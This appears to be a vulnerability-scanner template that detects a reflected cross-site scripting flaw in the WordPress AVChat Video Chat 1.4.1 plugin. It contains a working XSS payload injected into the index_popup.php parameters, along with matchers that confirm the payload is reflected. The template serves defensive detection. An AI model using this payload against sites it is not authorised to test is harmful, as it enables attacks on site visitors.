id: avchat-video-chat-xss

info:
  name: WordPress AVChat Video Chat 1.4.1 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress AVChat Video Chat 1.4.1 is vulnerable to reflected cross-site scripting via index_popup.php and multiple parameters.
  reference:
    - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
    - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
  tags: xss,wp,wpscan,wordpress,wp-plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="FB_appId"><script>alert(document.domain)</script>"'

      - type: word
        words:
          - 'text/html'
        part: header

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100881bb7354ac707d4f5e9073d1daa166da87828e8510e947ab4fe6b41b7ce4459022100c557b6e4c857c0f293535188b70f950c3af3691ddc8b41de841f84a4c80fa4f8:922c64590222798bb761d5b6d8e72950